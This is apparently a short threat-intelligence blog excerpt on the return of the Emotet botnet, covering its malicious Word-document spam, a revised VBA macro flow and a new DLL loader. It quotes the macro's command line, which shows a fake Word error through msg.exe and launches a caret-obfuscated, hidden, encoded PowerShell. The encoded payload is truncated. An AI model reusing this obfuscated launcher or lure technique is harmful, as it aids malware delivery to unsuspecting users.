Recently, the prolific botnet Emotet has returned after a hiatus of several months. Starting on Monday (Dec 21), Binary Defense observed Emotet spinning up massive spam campaigns that deliver malicious Microsoft Word documents as attachments. While the document lure looks visually similar to those Emotet used in the past, both the document file and the loader code received significant changes. First, the execution flow of the VBA macro in the document has changed. Instead of launching PowerShell directly from the embedded macro, the macro now passes execution to cmd in a new process, which eventually launches PowerShell with the following command; along the way it uses the msg.exe program to display a fake error message that appears to come from Word:
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD UwBlAHQAIAAoACcAVQAnACsAJwAyADYAcwBUACcAKQAgACAAKABbAFQAWQBwAGUAXQAoACIAewAzAH0Aew…
The second big change to Emotet is in the loader. Instead of dropping an EXE file, Emotet’s newest loader is a DLL that contains a single exported function named RunDLL, which executes Emotet’s main code.
These changes show that even though Emotet was not spamming during those long months, development of the malware continued.